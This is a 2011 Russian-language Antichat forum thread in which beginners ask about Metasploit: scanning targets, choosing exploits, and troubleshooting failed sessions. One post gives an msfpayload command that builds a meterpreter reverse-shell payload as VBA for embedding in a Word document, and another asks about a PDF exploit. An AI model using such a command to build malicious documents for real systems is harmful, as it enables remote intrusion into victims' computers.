HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Вопрос по Metasploit 3.5.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.03.2011, 11:18
Юдат
Новичок
Регистрация: 01.09.2010
Сообщений: 4
С нами: 8260886

Репутация: 0
По умолчанию
Доброго всем времени суток!

В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:

никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?

Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?

З.Ы. в манах ничего не нашел =(

И хотел бы уточнить, правильно ли я понимаю порядок действий?

1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий

2. находение сплоита отвечающего требованиям найденного, и конечной цели

3. использование сплоита с начинкой.

Зарание спасибо.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 02.04.2011, 18:54
neofit
Новичок
Регистрация: 14.11.2009
Сообщений: 0
С нами: 8679095

Репутация: 0
По умолчанию
Цитата:
Сообщение от Юдат  
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
З.Ы. в манах ничего не нашел =(
И хотел бы уточнить, правильно ли я понимаю порядок действий?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
2. находение сплоита отвечающего требованиям найденного, и конечной цели
3. использование сплоита с начинкой.
Зарание спасибо.
Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон.

Ну и автоподбор эксплойта рекомендую fast-track.
 
Ответить с цитированием

  #3  
Старый 05.04.2011, 00:49
dupD0M
Новичок
Регистрация: 18.05.2010
Сообщений: 17
С нами: 8412608

Репутация: 0
По умолчанию
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))

????
 
Ответить с цитированием

  #4  
Старый 05.04.2011, 06:06
neofit
Новичок
Регистрация: 14.11.2009
Сообщений: 0
С нами: 8679095

Репутация: 0
По умолчанию
Цитата:
Сообщение от dupD0M  
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
????
С другом твоим в локалке)))
 
Ответить с цитированием

  #5  
Старый 05.04.2011, 16:24
pahom
Новичок
Регистрация: 16.03.2011
Сообщений: 3
С нами: 7978646

Репутация: 0
По умолчанию
Здравствуйте. у меня такая проблемка

прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas

после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске"

места на диске 30 гб

подскажите в чем проблема?

спасибо.
 
Ответить с цитированием

  #6  
Старый 15.04.2011, 10:01
Oro4imaru
Новичок
Регистрация: 17.07.2010
Сообщений: 16
С нами: 8327126

Репутация: 0
По умолчанию
после запуска сплоита получаю вот такой ответ
[*] Started reverse double handler
[*] Sending Backdoor Command

[-] Not backdoored
[*] Exploit completed, but no session was created.

это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?
 
Ответить с цитированием

  #7  
Старый 01.05.2011, 08:23
ConnectOFF
Новичок
Регистрация: 13.04.2011
Сообщений: 14
С нами: 7938326

Репутация: 0
По умолчанию
Цитата:
Сообщение от Юдат  
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
З.Ы. в манах ничего не нашел =(
И хотел бы уточнить, правильно ли я понимаю порядок действий?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
2. находение сплоита отвечающего требованиям найденного, и конечной цели
3. использование сплоита с начинкой.
Зарание спасибо.
А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)
 
Ответить с цитированием

  #8  
Старый 15.05.2011, 06:31
K800
Флудер
Регистрация: 25.12.2010
Сообщений: 2,173
С нами: 8095286

Репутация: 372


По умолчанию
Цитата:
Сообщение от ConnectOFF  
А не мог бы ты подробнее описать как и чем ты все это делаешь)) команды хочу узнать)
/thread21599-Metasploit.html
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.